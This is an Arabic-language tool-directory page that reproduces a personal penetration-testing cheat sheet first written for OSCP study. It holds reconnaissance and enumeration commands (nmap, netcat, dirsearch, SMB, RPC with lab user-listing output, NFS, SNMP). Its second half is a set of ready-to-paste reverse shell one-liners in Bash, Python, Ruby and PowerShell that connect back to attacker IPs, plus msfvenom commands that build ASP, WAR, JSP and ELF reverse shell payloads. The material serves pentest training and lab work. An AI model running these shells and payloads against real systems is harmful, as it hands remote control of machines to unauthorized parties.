Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Pentest-Cheat-Sheet — هناك الكثير من أوراق الغش (Cheat Sheets) في العالم، لكن هذه ورقتي. | Kitploit
أدوات/GitHubGitHub/d0n601/pentest-cheat-sheet
كسر كلمات المرورتصعيد الامتيازاتالاستطلاعالاستغلالالحركة الجانبيةاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليمالفريق الأحمرموارد منسقة
GitHubd0n601/pentest-cheat-sheet
38918منذ سنة واحدةتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

Pentest-Cheat-Sheet

هناك الكثير من أوراق الغش (Cheat Sheets) في العالم، لكن هذه ورقتي.

عرض المستودع

ورقة الغش لاختبار الاختراق (Pentest Cheat Sheet)

هناك العديد من أوراق الغش في الخارج، لكن هذه ورقة غش خاصة بي. إنها عمل قيد التطوير حاليًا، وتعيش كمسودة أولية يتم تحديثها كثيرًا، في بعض الأحيان. بدأت هذا العمل أثناء دراستي لشهادة OSCP، لكنه الآن يتطور ليشمل أشياء عملية أكثر أحتاجها كمختبر اختراق للفريق الأحمر (Red Teamer). الإضافات الجديدة على الأرجح لن تكون مفيدة في الامتحان، وقد تتضمن حتى أدوات محظورة.

الاستطلاع (Recon)

غير مكتمل جدًا...

لينكس محليًا (Linux Local)

find / -name flag.txt للعثور على الملفات بالاسم.

grep -R "flag40" / -s -n للبحث عن سلسلة نصية في الملفات، مع البحث المتكرر بدءًا من الدليل الجذر، دون إظهار رسائل الخطأ.

ويندوز محليًا (Windows Local)

dir /s flag.txt للعثور على ملفات باسم flag.txt في الدليل الحالي والدلائل الفرعية.

الدليل النشط (Active Directory)

أداة مفيدة -> wadcoms.github.io

فحص المنافذ (Port Scanning)

nmap

nmap -sn 10.11.1.0/24 مسح الشبكة للعثور على الأجهزة.

  • nmap -sn 10.11.1.0/24 -oG - | awk '/Up$/{print $2}' > list_ips.txt فحص الشبكة بحثًا عن عناوين IP النشطة، وحفظ عناوين IP في قائمة.

nmap -A 10.10.10.10 لفحص سريع لمنافذ TCP الشائعة مع اكتشاف نظام التشغيل والخدمات.

nmap -A 10.10.10.10 -p- لفحص جميع منافذ TCP مع اكتشاف نظام التشغيل والخدمات.

nmap -A -sU 10.10.10.10 لفحص جميع منافذ UDP مع اكتشاف نظام التشغيل والخدمات.

sudo nmap -O -A -sV 10.10.10.10 لفحص جميع منافذ TCP الشائعة، والتعرف على بصمة نظام التشغيل، وتشغيل السكريبتات، والتقاط اللافتات (banners).

عبر Proxychains

proxychains nmap -Pn -sT 10.10.10.10 -v لأن فحوصات ICMP/UDP لا تعمل.

Netcat

العلامة -w لتحديد المهلة بالثواني والعلامة -z لإرسال صفر بايت من البيانات (للفحص)

nc -nvv -w 1 -z 10.11.1.220 3388-3390 فحص TCP للمنافذ من 3388 إلى 3390.

nc -nv -u -z -w 1 10.11.1.115 160-162 فحص UDP للمنافذ من 160 إلى 162.

تعداد الدلائل (Directory Enumeration)

Gobuster

  • مثال على كسر الدلائل gobuster dir -u http://10.1.1.27 -w /usr/share/wordlists/dirb/big.txt.

أنا أحب dirsearch أيضًا.

قوائم كلمات مفيدة على Kali

kali@kali:~/Tools/dirsearch$ ls /usr/share/wordlists
dirb  dirbuster  fasttrack.txt  fern-wifi  metasploit  nmap.lst  rockyou.txt  rockyou.txt.gz  wfuzz
kali@kali:~/Tools/dirsearch$ ls /usr/share/seclists
Discovery  Fuzzing  IOCs  Miscellaneous  Passwords  Pattern-Matching  Payloads  README.md  Usernames  Web-Shells
kali@kali:~/Tools/dirsearch$ 

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirb/big.txt -r تعداد الدلائل باستخدام big.txt من dirb، انسخ والصق مع تغيير IP/URL والامتدادات.

python3 dirsearch.py -u http://10.11.1.44 -t 100 -e php,gzip,tar,txt -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r تعداد الدلائل باستخدام قائمة الدلائل من dirbuster، انسخ والصق مع تغيير IP/URL والامتدادات.

python3 dirsearch.py -u http://10.11.1.71 -t 100 -e cgi -w /usr/share/seclists/Discovery/Web-Content/CGIs.txt -r، تخمين ملفات CGI.

تعداد المجلدات المشتركة (rsync)

وحدة rsync هي في الأساس مشاركة دليل. يمكن حماية هذه الوحدات اختياريًا بكلمة مرور. هذا الخيار يسرد الوحدات المتاحة ويحدد اختياريًا ما إذا كانت الوحدة تتطلب كلمة مرور للوصول**:**

nmap -sV --script "rsync-list-modules" -p <PORT> <IP>

تعداد SMB

يدويًا

smbclient -L 10.11.1.146 لسرد المشاركات المتاحة

smbclient //10.11.1.146/IPC$ لتسجيل الدخول إلى تلك المشاركة. إذا لم يعمل ذلك، جرب باستخدام sudo... sudo smbclient //10.11.1.146/IPC$

آليًا

enum4linux 10.11.1.146 -a -o لاستخدام enum4linux لأتمتة مشاركات smb.

تعداد RPC

إذا كان بإمكانك الاتصال بتسجيل دخول Null -> rpcclient -U '' -N forest.htb.

rpcclient $> querydomaininfo
command not found: querydomaininfo
rpcclient $> querydominfo
Domain:         HTB
Server:
Comment:
Total Users:    105
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
rpcclient $> 

مقال جيد
مقال جيد آخر

NFS

showmount -e 10.10.10.10 لرؤية المشاركات المتاحة mount -t nfs 10.10.10.10:/ /tmp -o nolock لتثبيت الدليل الجذر، أو أي مجلد آخر.

تعداد SNMP

onesixtyone -c community -i ips لفحص الشبكة المستهدفة وتحديد خوادم SNMP حيث community وips قائمتان، community = (public, private, manager).

snmp-check 10.11.1.227 يقوم بكل ما يلي، لكن بشكل أفضل ويقوم بتنسيقه لك بشكل جميل :)

snmpwalk -c public -v1 -t 10 10.11.1.115 تعداد شجرة MIB بالكامل.

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 تعداد مستخدمي Windows.

snmpwalk -c public -v1 10.11.1.73 1.3.6.1.2.1.25.4.2.1.2 تعداد عمليات Windows الجارية.

snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.6.13.1.3 تعداد منافذ TCP المفتوحة.

snmpwalk -c public -v1 10.11.1.50 1.3.6.1.2.1.25.6.3.1.2 تعداد البرامج المثبتة.

الشلات العكسية (Reverse Shells)

Bash

/bin/bash -i >& /dev/tcp/192.168.119.137/1337 0>&1

Python

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

Ruby

ruby -rsocket -e'f=TCPSocket.open("10.10.14.3",8081).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'

PowerShell

powershell -c "$client = New-Object System.Net.Sockets.TCPClient('192.168.119.137',1337);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"

المستمعون (Listeners)

Netat

nc -lvp 4444 الاستماع (لالتقاط) الشل العكسي باستخدام Netcat على المنفذ 4444

توسيع شل TTY

python -c 'import pty; pty.spawn("/bin/bash")' أو python3 -c 'import pty; pty.spawn("/bin/bash")'

MSFVenom

ASP

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f asp > shell.asp

WAR

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f war > shell.war

JSP

يعمل هذا أيضًا مع Cold Fusion بدلاً من الويب شل المعقد msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.119.137 LPORT=4444 -f raw > shell.jsp

ملف لينكس ثنائي

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.49.133 LPORT=443 -f elf > shell.elf

تنزيل الأداة